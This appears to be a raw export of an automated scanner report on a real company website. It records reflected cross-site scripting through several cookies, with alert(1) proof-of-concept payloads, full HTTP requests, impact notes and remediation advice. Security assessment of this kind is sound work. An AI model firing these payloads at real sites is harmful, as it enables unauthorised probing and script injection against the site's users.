GET /managed_hosting/saas/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D69814"%3balert(1)//84f738c2ee7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e69ee"><script>alert(1)</script>975c3bcb5eb was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/saas/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=De69ee"><script>alert(1)</script>975c3bcb5eb; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28d35"><script>alert(1)</script>28a334b90f5 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f828d35"><script>alert(1)</script>28a334b90f5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c337"%3balert(1)//d1ca4121bc2 was submitted in the IS_UASrackuid cookie. This input was echoed as 3c337";alert(1)//d1ca4121bc2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f83c337"%3balert(1)//d1ca4121bc2; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:10:43 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 42310
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33fb5"%3balert(1)//93b1f01f944 was submitted in the chatslider cookie. This input was echoed as 33fb5";alert(1)//93b1f01f944 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D33fb5"%3balert(1)//93b1f01f944; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 871cf"><script>alert(1)</script>ca077b1a90d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D871cf"><script>alert(1)</script>ca077b1a90d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the lpUASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31aa"><script>alert(1)</script>7592d91ab4a was submitted in the lpUASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/database/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e31aa"><script>alert(1)</script>7592d91ab4a; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83faa"><script>alert(1)</script>0ddf46aef0e was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f883faa"><script>alert(1)</script>0ddf46aef0e; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c77e"%3balert(1)//a445432c1d7 was submitted in the IS_UASrackuid cookie. This input was echoed as 4c77e";alert(1)//a445432c1d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84c77e"%3balert(1)//a445432c1d7; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e67e"%3balert(1)//6221dc83b7f was submitted in the chatslider cookie. This input was echoed as 3e67e";alert(1)//6221dc83b7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/services/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3e67e"%3balert(1)//6221dc83b7f; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ee7a"><script>alert(1)</script>000fbc348eb was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3ee7a"><script>alert(1)</script>000fbc348eb; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c22cc"><script>alert(1)</script>770593c3da5 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/services/proservices/criticalsites.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c22cc"><script>alert(1)</script>770593c3da5; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8826"%3balert(1)//f82e40c950a was submitted in the IS_UASrackuid cookie. This input was echoed as c8826";alert(1)//f82e40c950a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
